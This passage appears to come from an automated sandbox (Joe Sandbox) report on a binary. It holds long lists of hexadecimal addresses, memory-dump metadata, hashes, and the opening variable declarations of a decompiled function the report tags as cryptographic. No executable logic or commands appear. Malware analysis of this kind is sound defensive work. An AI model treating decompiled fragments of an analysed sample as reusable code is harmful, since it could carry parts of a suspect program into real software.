                                                                                                                    0x00fc52ca
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc52d0
                                                                                                                    0x00fc52d3
                                                                                                                    0x00fc52d3
                                                                                                                    0x00fc52d6
                                                                                                                    0x00fc52db
                                                                                                                    0x00fc5330
                                                                                                                    0x00fc5330
                                                                                                                    0x00fc5338
                                                                                                                    0x00fc5395
                                                                                                                    0x00fc5397
                                                                                                                    0x00fc539a
                                                                                                                    0x00fc539c
                                                                                                                    0x00fc539e
                                                                                                                    0x00fc539e
                                                                                                                    0x00fc53a2
                                                                                                                    0x00fc53a2
                                                                                                                    0x00fc53a5
                                                                                                                    0x00fc53a8
                                                                                                                    0x00fc53aa
                                                                                                                    0x00fc53af
                                                                                                                    0x00fc53b4
                                                                                                                    0x00fc53b4
                                                                                                                    0x00000000
                                                                                                                    0x00fc53aa
                                                                                                                    0x00fc5341
                                                                                                                    0x00fc5387
                                                                                                                    0x00fc5389
                                                                                                                    0x00fc538c
                                                                                                                    0x00fc538c
                                                                                                                    0x00fc538f
                                                                                                                    0x00fc5391
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc5393
                                                                                                                    0x00fc5343
                                                                                                                    0x00fc534a
                                                                                                                    0x00fc534d
                                                                                                                    0x00fc5353
                                                                                                                    0x00fc5356
                                                                                                                    0x00fc5356
                                                                                                                    0x00fc535e
                                                                                                                    0x00fc5363
                                                                                                                    0x00fc5368
                                                                                                                    0x00fc536d
                                                                                                                    0x00fc537b
                                                                                                                    0x00000000
                                                                                                                    0x00fc536f
                                                                                                                    0x00fc5370
                                                                                                                    0x00fc5376
                                                                                                                    0x00000000
                                                                                                                    0x00fc5376
                                                                                                                    0x00fc536d
                                                                                                                    0x00fc52e1
                                                                                                                    0x00fc52f1
                                                                                                                    0x00000000
                                                                                                                    0x00fc52fe
                                                                                                                    0x00fc52fe
                                                                                                                    0x00fc5306
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc530a
                                                                                                                    0x00fc5310
                                                                                                                    0x00fc5316
                                                                                                                    0x00fc5322
                                                                                                                    0x00fc5328
                                                                                                                    0x00fc5328
                                                                                                                    0x00000000
                                                                                                                    0x00fc5322
                                                                                                                    0x00fc52f1
                                                                                                                    0x00fc52e3
                                                                                                                    0x00000000
                                                                                                                    0x00fc52e3
                                                                                                                    0x00fc5249
                                                                                                                    0x00fc524b
                                                                                                                    0x00fc524b
                                                                                                                    0x00fc5264
                                                                                                                    0x00fc5270
                                                                                                                    0x00fc5275
                                                                                                                    0x00fc527a
                                                                                                                    0x00fc527d
                                                                                                                    0x00fc527e
                                                                                                                    0x00fc5281
                                                                                                                    0x00fc5281
                                                                                                                    0x00fc5286
                                                                                                                    0x00000000
                                                                                                                    0x00fc5286
                                                                                                                    0x00fc51a0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc51a6
                                                                                                                    0x00fc51ac
                                                                                                                    0x00fc51bf
                                                                                                                    0x00fc51bf
                                                                                                                    0x00fc51c2
                                                                                                                    0x00fc51c8
                                                                                                                    0x00fc51cb
                                                                                                                    0x00fc51d1
                                                                                                                    0x00fc51d6
                                                                                                                    0x00fc51de
                                                                                                                    0x00fc51e2
                                                                                                                    0x00fc51ea
                                                                                                                    0x00fc51f2
                                                                                                                    0x00000000
                                                                                                                    0x00fc51f2
                                                                                                                    0x00fc51af
                                                                                                                    0x00fc51b4
                                                                                                                    0x00fc51b9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc51b9
                                                                                                                    0x00fc5192
                                                                                                                    0x00fc5082
                                                                                                                    0x00fc5088
                                                                                                                    0x00fc5084
                                                                                                                    0x00fc5084
                                                                                                                    0x00fc5084
                                                                                                                    0x00fc509e
                                                                                                                    0x00fc50a0
                                                                                                                    0x00fc50a5
                                                                                                                    0x00fc5157
                                                                                                                    0x00fc515c
                                                                                                                    0x00000000
                                                                                                                    0x00fc50ab
                                                                                                                    0x00fc50ab
                                                                                                                    0x00fc50af
                                                                                                                    0x00fc50cb
                                                                                                                    0x00fc50d1
                                                                                                                    0x00fc50d4
                                                                                                                    0x00fc50c1
                                                                                                                    0x00fc50c1
                                                                                                                    0x00fc50c1
                                                                                                                    0x00fc50e0
                                                                                                                    0x00fc50e3
                                                                                                                    0x00fc50e6
                                                                                                                    0x00000000
                                                                                                                    0x00fc50e6
                                                                                                                    0x00fc4ffd
                                                                                                                    0x00fc4ffd
                                                                                                                    0x00fc5001
                                                                                                                    0x00fc501d
                                                                                                                    0x00fc5023
                                                                                                                    0x00fc5026
                                                                                                                    0x00fc5013
                                                                                                                    0x00fc5013
                                                                                                                    0x00fc5013
                                                                                                                    0x00fc5032
                                                                                                                    0x00fc5035
                                                                                                                    0x00000000
                                                                                                                    0x00fc5035
                                                                                                                    0x00fc4ffb
                                                                                                                    0x00fc4fd4
                                                                                                                    0x00fc4f4e
                                                                                                                    0x00fc4f51
                                                                                                                    0x00fc4f54
                                                                                                                    0x00fc4f57
                                                                                                                    0x00fc4f5b
                                                                                                                    0x00fc4f61
                                                                                                                    0x00fc4f64
                                                                                                                    0x00fc4f64
                                                                                                                    0x00000000
                                                                                                                    0x00fc4f5b
                                                                                                                    0x00fc4e8f
                                                                                                                    0x00fc4e95
                                                                                                                    0x00fc4e91
                                                                                                                    0x00fc4e91
                                                                                                                    0x00fc4e91
                                                                                                                    0x00fc4eab
                                                                                                                    0x00fc4ead
                                                                                                                    0x00fc4eb2
                                                                                                                    0x00000000
                                                                                                                    0x00fc4eb4
                                                                                                                    0x00fc4eb4
                                                                                                                    0x00fc4eb8
                                                                                                                    0x00fc4ed4
                                                                                                                    0x00fc4eda
                                                                                                                    0x00fc4edd
                                                                                                                    0x00fc4eca
                                                                                                                    0x00fc4eca
                                                                                                                    0x00fc4eca
                                                                                                                    0x00fc4ee6
                                                                                                                    0x00fc4eec
                                                                                                                    0x00fc4eef
                                                                                                                    0x00000000
                                                                                                                    0x00fc4eef
                                                                                                                    0x00fc4eb2
                                                                                                                    0x00fc4dd7
                                                                                                                    0x00fc4ddd
                                                                                                                    0x00fc4dd9
                                                                                                                    0x00fc4dd9
                                                                                                                    0x00fc4dd9
                                                                                                                    0x00fc4df3
                                                                                                                    0x00fc4df5
                                                                                                                    0x00fc4dfa
                                                                                                                    0x00000000
                                                                                                                    0x00fc4dfc
                                                                                                                    0x00fc4dfc
                                                                                                                    0x00fc4e00
                                                                                                                    0x00fc4e1c
                                                                                                                    0x00fc4e22
                                                                                                                    0x00fc4e25
                                                                                                                    0x00fc4e12
                                                                                                                    0x00fc4e12
                                                                                                                    0x00fc4e12
                                                                                                                    0x00fc4e31
                                                                                                                    0x00fc4e34
                                                                                                                    0x00000000
                                                                                                                    0x00fc4e34
                                                                                                                    0x00fc4dfa
                                                                                                                    0x00fc4c5a
                                                                                                                    0x00fc4c5d
                                                                                                                    0x00fc4c5d
                                                                                                                    0x00fc4c60
                                                                                                                    0x00fc4c63
                                                                                                                    0x00fc4c69
                                                                                                                    0x00fc4c6f
                                                                                                                    0x00fc4c72
                                                                                                                    0x00fc4d1b
                                                                                                                    0x00fc4d7f
                                                                                                                    0x00fc4d82
                                                                                                                    0x00fc4d8b
                                                                                                                    0x00fc4d94
                                                                                                                    0x00fc4d99
                                                                                                                    0x00fc4d9d
                                                                                                                    0x00fc4da0
                                                                                                                    0x00fc4da3
                                                                                                                    0x00fc4daa
                                                                                                                    0x00fc4db1
                                                                                                                    0x00fc4db1
                                                                                                                    0x00000000
                                                                                                                    0x00fc4db1
                                                                                                                    0x00fc4d1f
                                                                                                                    0x00fc4d25
                                                                                                                    0x00fc4d21
                                                                                                                    0x00fc4d21
                                                                                                                    0x00fc4d21
                                                                                                                    0x00fc4d3b
                                                                                                                    0x00fc4d3d
                                                                                                                    0x00fc4d42
                                                                                                                    0x00000000
                                                                                                                    0x00fc4d44
                                                                                                                    0x00fc4d44
                                                                                                                    0x00fc4d48
                                                                                                                    0x00fc4d64
                                                                                                                    0x00fc4d6a
                                                                                                                    0x00fc4d6d
                                                                                                                    0x00fc4d5a
                                                                                                                    0x00fc4d5a
                                                                                                                    0x00fc4d5a
                                                                                                                    0x00fc4d79
                                                                                                                    0x00fc4d7c
                                                                                                                    0x00000000
                                                                                                                    0x00fc4d7c
                                                                                                                    0x00fc4d42
                                                                                                                    0x00fc4c7a
                                                                                                                    0x00fc4ce2
                                                                                                                    0x00fc4ce2
                                                                                                                    0x00fc4ce5
                                                                                                                    0x00fc4ceb
                                                                                                                    0x00fc4cee
                                                                                                                    0x00fc4cf5
                                                                                                                    0x00fc4cfb
                                                                                                                    0x00fc4d00
                                                                                                                    0x00fc4d04
                                                                                                                    0x00fc4d0c
                                                                                                                    0x00000000
                                                                                                                    0x00fc4d0c
                                                                                                                    0x00fc4c7e
                                                                                                                    0x00fc4c84
                                                                                                                    0x00fc4c80
                                                                                                                    0x00fc4c80
                                                                                                                    0x00fc4c80
                                                                                                                    0x00fc4c9a
                                                                                                                    0x00fc4c9c
                                                                                                                    0x00fc4ca1
                                                                                                                    0x00fc4ca7
                                                                                                                    0x00fc4cab
                                                                                                                    0x00fc4cc7
                                                                                                                    0x00fc4ccd
                                                                                                                    0x00fc4cd0
                                                                                                                    0x00fc4cbd
                                                                                                                    0x00fc4cbd
                                                                                                                    0x00fc4cbd
                                                                                                                    0x00fc4cdc
                                                                                                                    0x00fc4cdf
                                                                                                                    0x00000000
                                                                                                                    0x00fc4cdf
                                                                                                                    0x00fc4db5
                                                                                                                    0x00fc4db8
                                                                                                                    0x00fc4dbb
                                                                                                                    0x00fc4dbe
                                                                                                                    0x00fc4dbf
                                                                                                                    0x00fc4dc2
                                                                                                                    0x00fc4dc2
                                                                                                                    0x00000000
                                                                                                                    0x00fc4c5d
                                                                                                                    0x00fc4bf9
                                                                                                                    0x00fc4bfc
                                                                                                                    0x00fc4bfe
                                                                                                                    0x00fc4bfe
                                                                                                                    0x00fc4c07
                                                                                                                    0x00fc4c07
                                                                                                                    0x00fc4c0b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc4c12
                                                                                                                    0x00fc4c34
                                                                                                                    0x00000000
                                                                                                                    0x00fc4c34
                                                                                                                    0x00fc4c14
                                                                                                                    0x00fc4c17
                                                                                                                    0x00fc4c17
                                                                                                                    0x00fc4c18
                                                                                                                    0x00fc4c1b
                                                                                                                    0x00fc4c23
                                                                                                                    0x00fc4c29
                                                                                                                    0x00fc4c2c
                                                                                                                    0x00fc4c2f
                                                                                                                    0x00000000
                                                                                                                    0x00fc57a3
                                                                                                                    0x00fc57a3
                                                                                                                    0x00fc57a3
                                                                                                                    0x00fc57a6
                                                                                                                    0x00fc57a7
                                                                                                                    0x00fc57aa
                                                                                                                    0x00fc57ad
                                                                                                                    0x00000000
                                                                                                                    0x00fc4bd8
                                                                                                                    0x00fc49d3
                                                                                                                    0x00fc49da
                                                                                                                    0x00fc4a17
                                                                                                                    0x00fc49de
                                                                                                                    0x00fc49e1
                                                                                                                    0x00fc49ed
                                                                                                                    0x00fc49f1
                                                                                                                    0x00fc4a54
                                                                                                                    0x00fc4a54
                                                                                                                    0x00fc4a57
                                                                                                                    0x00fc4a5d
                                                                                                                    0x00fc4a78
                                                                                                                    0x00fc4a78
                                                                                                                    0x00fc4a7b
                                                                                                                    0x00fc4a81
                                                                                                                    0x00fc4a87
                                                                                                                    0x00fc4a8d
                                                                                                                    0x00fc4a92
                                                                                                                    0x00fc4a96
                                                                                                                    0x00fc4a9e
                                                                                                                    0x00fc4aa2
                                                                                                                    0x00fc4aaa
                                                                                                                    0x00fc4aae
                                                                                                                    0x00fc4aae
                                                                                                                    0x00fc4ab4
                                                                                                                    0x00fc4af4
                                                                                                                    0x00fc4afa
                                                                                                                    0x00fc4b10
                                                                                                                    0x00fc4b10
                                                                                                                    0x00fc4b13
                                                                                                                    0x00fc4b16
                                                                                                                    0x00fc4b19
                                                                                                                    0x00fc4b1f
                                                                                                                    0x00fc4b24
                                                                                                                    0x00fc4b2c
                                                                                                                    0x00fc4b30
                                                                                                                    0x00fc4b38
                                                                                                                    0x00fc4b40
                                                                                                                    0x00fc4b44
                                                                                                                    0x00fc4b44
                                                                                                                    0x00fc4b47
                                                                                                                    0x00fc4b4b
                                                                                                                    0x00fc4b85
                                                                                                                    0x00fc4b53
                                                                                                                    0x00fc4b55
                                                                                                                    0x00fc4b5a
                                                                                                                    0x00fc4b5a
                                                                                                                    0x00fc4b62
                                                                                                                    0x00fc4b6b
                                                                                                                    0x00fc4b70
                                                                                                                    0x00fc4b77
                                                                                                                    0x00fc4b77
                                                                                                                    0x00fc4b8a
                                                                                                                    0x00fc4b8d
                                                                                                                    0x00fc4b90
                                                                                                                    0x00fc4b95
                                                                                                                    0x00fc4b9d
                                                                                                                    0x00fc4b9d
                                                                                                                    0x00fc4ba5
                                                                                                                    0x00fc4ba7
                                                                                                                    0x00fc4baa
                                                                                                                    0x00fc4baf
                                                                                                                    0x00fc4bb7
                                                                                                                    0x00fc4bb7
                                                                                                                    0x00fc4baf
                                                                                                                    0x00000000
                                                                                                                    0x00fc4ba5
                                                                                                                    0x00fc4afd
                                                                                                                    0x00fc4b02
                                                                                                                    0x00fc4b07
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc4b09
                                                                                                                    0x00000000
                                                                                                                    0x00fc4b09
                                                                                                                    0x00fc4ab6
                                                                                                                    0x00fc4ab6
                                                                                                                    0x00fc4a60
                                                                                                                    0x00fc4a65
                                                                                                                    0x00fc4a6a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc4a6f
                                                                                                                    0x00000000
                                                                                                                    0x00fc4a6f
                                                                                                                    0x00fc49f3
                                                                                                                    0x00fc49f6
                                                                                                                    0x00fc49fc
                                                                                                                    0x00fc4a23
                                                                                                                    0x00fc4a26
                                                                                                                    0x00fc4a2c
                                                                                                                    0x00fc4a2f
                                                                                                                    0x00fc4a32
                                                                                                                    0x00fc4a36
                                                                                                                    0x00fc4a3b
                                                                                                                    0x00fc4a3f
                                                                                                                    0x00fc4a46
                                                                                                                    0x00fc4a49
                                                                                                                    0x00fc4a50
                                                                                                                    0x00000000
                                                                                                                    0x00fc4a50
                                                                                                                    0x00fc49ff
                                                                                                                    0x00fc4a04
                                                                                                                    0x00fc4a09
                                                                                                                    0x00fc4a20
                                                                                                                    0x00000000
                                                                                                                    0x00fc4a20
                                                                                                                    0x00fc4a0b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc49e1
                                                                                                                    0x00fc4a19
                                                                                                                    0x00000000
                                                                                                                    0x00fc4a19
                                                                                                                    0x00fc49dc
                                                                                                                    0x00000000
                                                                                                                    0x00fc49dc
                                                                                                                    0x00fc48d5
                                                                                                                    0x00fc49c6
                                                                                                                    0x00fc49c6
                                                                                                                    0x00000000
                                                                                                                    0x00fc49c6
                                                                                                                    0x00fc48e1
                                                                                                                    0x00fc48e6
                                                                                                                    0x00fc48f2
                                                                                                                    0x00fc48f6
                                                                                                                    0x00fc48fb
                                                                                                                    0x00fc4907
                                                                                                                    0x00fc490e
                                                                                                                    0x00fc4962
                                                                                                                    0x00fc4968
                                                                                                                    0x00fc4977
                                                                                                                    0x00fc4977
                                                                                                                    0x00fc497a
                                                                                                                    0x00fc497d
                                                                                                                    0x00fc4980
                                                                                                                    0x00fc4986
                                                                                                                    0x00fc498b
                                                                                                                    0x00fc4993
                                                                                                                    0x00fc4997
                                                                                                                    0x00fc499f
                                                                                                                    0x00fc49a7
                                                                                                                    0x00fc49ab
                                                                                                                    0x00fc49ab
                                                                                                                    0x00fc49ae
                                                                                                                    0x00fc49ae
                                                                                                                    0x00fc49b3
                                                                                                                    0x00fc49c1
                                                                                                                    0x00fc49c1
                                                                                                                    0x00fc49c3
                                                                                                                    0x00000000
                                                                                                                    0x00fc49c3
                                                                                                                    0x00fc496b
                                                                                                                    0x00fc4970
                                                                                                                    0x00fc4975
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc4975
                                                                                                                    0x00fc4910
                                                                                                                    0x00fc4916
                                                                                                                    0x00fc4929
                                                                                                                    0x00fc4929
                                                                                                                    0x00fc492c
                                                                                                                    0x00fc4932
                                                                                                                    0x00fc4935
                                                                                                                    0x00fc493b
                                                                                                                    0x00fc4940
                                                                                                                    0x00fc4948
                                                                                                                    0x00fc494c
                                                                                                                    0x00fc4954
                                                                                                                    0x00fc495c
                                                                                                                    0x00000000
                                                                                                                    0x00fc495c
                                                                                                                    0x00fc4919
                                                                                                                    0x00fc491e
                                                                                                                    0x00fc4923
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc473c
                                                                                                                    0x00fc473c
                                                                                                                    0x00fc473f
                                                                                                                    0x00fc4742
                                                                                                                    0x00fc4744
                                                                                                                    0x00fc4746
                                                                                                                    0x00fc474d
                                                                                                                    0x00fc474f
                                                                                                                    0x00fc4760
                                                                                                                    0x00fc4760
                                                                                                                    0x00fc4763
                                                                                                                    0x00fc4766
                                                                                                                    0x00fc476d
                                                                                                                    0x00fc489d
                                                                                                                    0x00fc489d
                                                                                                                    0x00fc48a0
                                                                                                                    0x00fc48a0
                                                                                                                    0x00fc48a3
                                                                                                                    0x00000000
                                                                                                                    0x00fc48a3
                                                                                                                    0x00fc4773
                                                                                                                    0x00fc4779
                                                                                                                    0x00fc4782
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc477b
                                                                                                                    0x00fc477b
                                                                                                                    0x00fc4784
                                                                                                                    0x00fc4787
                                                                                                                    0x00fc4816
                                                                                                                    0x00fc484a
                                                                                                                    0x00fc4853
                                                                                                                    0x00fc4866
                                                                                                                    0x00fc486b
                                                                                                                    0x00fc4870
                                                                                                                    0x00fc4875
                                                                                                                    0x00fc487a
                                                                                                                    0x00fc4881
                                                                                                                    0x00fc4886
                                                                                                                    0x00fc4886
                                                                                                                    0x00fc487a
                                                                                                                    0x00fc4889
                                                                                                                    0x00fc488e
                                                                                                                    0x00fc4896
                                                                                                                    0x00fc4896
                                                                                                                    0x00fc489a
                                                                                                                    0x00fc489a
                                                                                                                    0x00000000
                                                                                                                    0x00fc489a
                                                                                                                    0x00fc481b
                                                                                                                    0x00fc479d
                                                                                                                    0x00fc47a4
                                                                                                                    0x00fc47af
                                                                                                                    0x00fc47bf
                                                                                                                    0x00fc47c4
                                                                                                                    0x00fc47c7
                                                                                                                    0x00fc47c9
                                                                                                                    0x00fc47cc
                                                                                                                    0x00fc47d1
                                                                                                                    0x00fc4840
                                                                                                                    0x00fc4845
                                                                                                                    0x00000000
                                                                                                                    0x00fc47d9
                                                                                                                    0x00fc47e4
                                                                                                                    0x00fc47ed
                                                                                                                    0x00fc47f2
                                                                                                                    0x00fc47f5
                                                                                                                    0x00fc47f8
                                                                                                                    0x00fc47fb
                                                                                                                    0x00fc47fe
                                                                                                                    0x00fc4807
                                                                                                                    0x00fc4833
                                                                                                                    0x00fc4836
                                                                                                                    0x00fc4809
                                                                                                                    0x00fc4809
                                                                                                                    0x00fc480c
                                                                                                                    0x00fc480c
                                                                                                                    0x00000000
                                                                                                                    0x00fc4807
                                                                                                                    0x00fc47d1
                                                                                                                    0x00fc4820
                                                                                                                    0x00000000
                                                                                                                    0x00fc4822
                                                                                                                    0x00fc4829
                                                                                                                    0x00fc482e
                                                                                                                    0x00000000
                                                                                                                    0x00fc482e
                                                                                                                    0x00fc4820
                                                                                                                    0x00fc4792
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc4798
                                                                                                                    0x00fc4798
                                                                                                                    0x00000000
                                                                                                                    0x00fc4798
                                                                                                                    0x00fc48a6
                                                                                                                    0x00fc48a6
                                                                                                                    0x00fc48a7
                                                                                                                    0x00fc48aa
                                                                                                                    0x00fc48ab
                                                                                                                    0x00fc48ae
                                                                                                                    0x00fc48b3
                                                                                                                    0x00fc4757
                                                                                                                    0x00fc475a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc48b9
                                                                                                                    0x00fc48b9
                                                                                                                    0x00fc48bc
                                                                                                                    0x00000000
                                                                                                                    0x00fc48bc
                                                                                                                    0x00fc48b3
                                                                                                                    0x00fc4736
                                                                                                                    0x00fc46da
                                                                                                                    0x00fc46e4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c$x|G
                                                                                                                    • API String ID: 0-103815624
                                                                                                                    • Opcode ID: 8ccb674b2108410702d546771fae544e01e7b67cd1c6da866face146c9ed847c
                                                                                                                    • Instruction ID: 7bb4c13356e876722d3d7b74b9288dd33ee35be9869661d573361aa0c226e4e5
                                                                                                                    • Opcode Fuzzy Hash: 8ccb674b2108410702d546771fae544e01e7b67cd1c6da866face146c9ed847c
                                                                                                                    • Instruction Fuzzy Hash: EAC2D870A006068FCB24DF18CA91FAAB7B1FF44314F24856DE8568B352D736F996DB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FAC387 Relevance: 7.6, APIs: 2, Strings: 1, Instructions: 2344COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E00FAC387(signed int* _a4, intOrPtr* _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int* _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				signed int _v112;
				signed int _v116;
				char* _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t1519;
				signed int _t1521;
				intOrPtr _t1525;
				signed int _t1527;
				signed int _t1529;
				intOrPtr _t1530;
				unsigned int _t1532;
				intOrPtr _t1533;
				signed int _t1534;
				intOrPtr _t1541;
				intOrPtr _t1543;
				unsigned int _t1544;
				intOrPtr _t1545;
				unsigned int _t1550;
				intOrPtr _t1551;
				unsigned int _t1552;
				intOrPtr _t1553;
				intOrPtr _t1558;
				unsigned int _t1559;
				intOrPtr _t1560;
				unsigned int _t1561;
				intOrPtr _t1562;
				signed int _t1566;
				unsigned int _t1569;
				intOrPtr _t1570;
				unsigned int _t1571;
				intOrPtr _t1572;
				unsigned int _t1573;
				intOrPtr _t1574;
				unsigned int _t1575;
				intOrPtr _t1576;
				unsigned int _t1577;
				intOrPtr _t1578;
				unsigned int _t1579;
				intOrPtr _t1580;
				unsigned int _t1581;
				intOrPtr _t1582;
				unsigned int _t1583;
				intOrPtr _t1584;
				unsigned int _t1585;
				intOrPtr _t1586;
				signed int _t1587;
				intOrPtr _t1591;
				signed int _t1593;
				intOrPtr _t1596;
				intOrPtr _t1597;
				signed int _t1598;
				intOrPtr _t1599;
				intOrPtr _t1600;
				intOrPtr _t1611;
				intOrPtr* _t1619;
				intOrPtr* _t1620;
				intOrPtr _t1626;
				void* _t1627;
				void* _t1631;
				void* _t1632;
				void* _t1634;
				void* _t1635;
				void* _t1636;
				signed int _t1637;
				signed int _t1639;
				signed int _t1643;
				signed int _t1646;
				signed int _t1650;
				signed int _t1653;
				signed int _t1657;
				signed int _t1660;
				signed int _t1664;
				signed int _t1667;
				signed int _t1671;
				signed int _t1674;
				signed int _t1678;
				signed int _t1681;
				signed int _t1685;
				signed int _t1688;
				signed int _t1692;
				signed int _t1695;
				signed int _t1699;
				unsigned int _t1702;
				intOrPtr _t1703;
				unsigned int _t1704;
				intOrPtr _t1705;
				unsigned int _t1706;
				intOrPtr _t1707;
				unsigned int _t1708;
				intOrPtr _t1709;
				signed int _t1710;
				signed int _t1714;
				signed int _t1717;
				signed int _t1721;
				signed int _t1724;
				signed int _t1728;
				signed int _t1731;
				signed int _t1735;
				signed int _t1738;
				void* _t1742;
				signed int _t1743;
				signed int _t1746;
				void* _t1750;
				signed int _t1751;
				signed int _t1754;
				void* _t1758;
				signed int _t1759;
				signed int _t1762;
				void* _t1766;
				signed int _t1767;
				signed int _t1770;
				void* _t1774;
				signed int _t1775;
				intOrPtr _t1781;
				intOrPtr _t1784;
				intOrPtr _t1787;
				intOrPtr* _t1796;
				intOrPtr _t1820;
				intOrPtr _t1823;
				intOrPtr _t1826;
				intOrPtr* _t1835;
				signed int _t1858;
				signed int _t1859;
				intOrPtr _t1860;
				unsigned int _t1862;
				intOrPtr _t1863;
				unsigned int _t1864;
				intOrPtr _t1865;
				signed int _t1866;
				void* _t1870;
				signed int _t1871;
				signed int _t1874;
				void* _t1878;
				signed int _t1879;
				intOrPtr _t1891;
				signed int _t1895;
				intOrPtr _t1896;
				intOrPtr _t1899;
				intOrPtr _t1904;
				signed int _t1905;
				void* _t1909;
				signed int _t1910;
				intOrPtr _t1929;
				signed int _t1934;
				intOrPtr _t1935;
				intOrPtr _t1938;
				intOrPtr _t1943;
				signed int _t1946;
				intOrPtr _t1947;
				intOrPtr _t1950;
				intOrPtr _t1955;
				signed int* _t1966;
				intOrPtr _t1969;
				intOrPtr _t1972;
				intOrPtr _t1977;
				signed int _t1979;
				intOrPtr _t1980;
				signed int _t1981;
				intOrPtr* _t1983;
				signed int _t1984;
				signed int _t1985;
				signed int* _t1986;
				intOrPtr* _t1987;
				signed int _t1988;
				intOrPtr _t1990;
				intOrPtr _t1992;
				signed int _t1993;
				signed int _t1995;
				signed int _t1996;
				intOrPtr _t1997;
				signed int _t1998;
				signed int _t1999;
				signed int _t2000;
				signed int _t2001;
				signed int _t2002;
				signed int _t2003;
				signed int _t2004;
				signed int _t2005;
				signed int _t2006;
				signed int _t2007;
				signed int _t2008;
				signed int _t2009;
				signed int _t2010;
				signed int _t2011;
				signed int _t2012;
				signed int _t2013;
				intOrPtr _t2014;
				signed int _t2015;
				signed int* _t2016;
				intOrPtr _t2017;
				void* _t2024;
				signed int _t2025;
				void* _t2026;
				signed int _t2027;
				void* _t2028;
				signed int _t2029;
				void* _t2030;
				signed int _t2031;
				void* _t2032;
				signed int _t2033;
				void* _t2034;
				signed int _t2035;
				void* _t2036;
				signed int _t2037;
				void* _t2038;
				signed int _t2039;
				void* _t2040;
				signed int _t2041;
				signed int _t2042;
				signed int _t2043;
				signed int _t2044;
				signed int _t2045;
				void* _t2046;
				signed int _t2047;
				void* _t2048;
				signed int _t2049;
				void* _t2050;
				signed int _t2051;
				void* _t2052;
				signed int _t2053;
				signed int _t2054;
				signed int _t2055;
				signed int _t2056;
				signed int _t2057;
				signed int _t2058;
				intOrPtr _t2060;
				signed int _t2061;
				signed int _t2062;
				intOrPtr _t2064;
				signed int _t2065;
				signed int _t2066;
				signed int _t2067;
				signed int _t2068;
				signed int _t2069;
				signed int _t2070;
				signed int _t2071;
				signed int _t2072;
				signed int _t2073;
				intOrPtr* _t2076;
				signed int _t2077;
				intOrPtr* _t2079;
				signed int _t2080;
				short _t2081;
				signed short _t2082;
				signed int _t2083;
				void* _t2087;
				signed int _t2090;
				signed int* _t2092;
				signed int _t2094;
				signed int _t2095;
				signed int _t2103;
				signed int _t2112;
				signed int _t2126;
				signed int _t2133;
				intOrPtr _t2187;
				signed int _t2189;
				signed int _t2190;
				signed int _t2191;
				signed short* _t2194;
				signed short* _t2195;
				signed int _t2197;
				signed int _t2198;
				signed int _t2199;
				signed int _t2200;
				signed int _t2202;
				signed int _t2203;
				signed int _t2205;
				signed int _t2206;
				signed int _t2207;
				signed int _t2208;
				signed int _t2209;
				signed int _t2210;
				signed int _t2211;
				signed int _t2212;
				intOrPtr* _t2213;
				signed int _t2214;
				signed int _t2215;
				signed int _t2216;
				signed int _t2217;
				void* _t2218;
				void* _t2221;
				signed int _t2222;
				signed int _t2223;
				intOrPtr* _t2224;
				signed int _t2225;
				void* _t2227;
				signed int _t2228;
				signed int _t2229;
				signed int _t2230;
				signed int _t2234;
				signed int _t2235;
				signed int _t2236;
				signed int _t2237;
				signed int _t2238;
				signed int _t2240;
				intOrPtr _t2241;
				intOrPtr _t2242;
				intOrPtr _t2243;
				intOrPtr _t2244;
				intOrPtr _t2245;
				intOrPtr _t2246;
				intOrPtr _t2247;
				intOrPtr _t2248;
				intOrPtr _t2249;
				intOrPtr _t2250;
				intOrPtr _t2251;
				intOrPtr _t2252;
				intOrPtr _t2253;
				intOrPtr _t2254;
				intOrPtr _t2255;
				intOrPtr _t2256;
				intOrPtr _t2257;
				intOrPtr _t2258;
				intOrPtr _t2259;
				intOrPtr _t2260;
				void* _t2261;
				intOrPtr _t2262;
				void* _t2263;
				signed int _t2264;
				void* _t2266;
				intOrPtr _t2267;
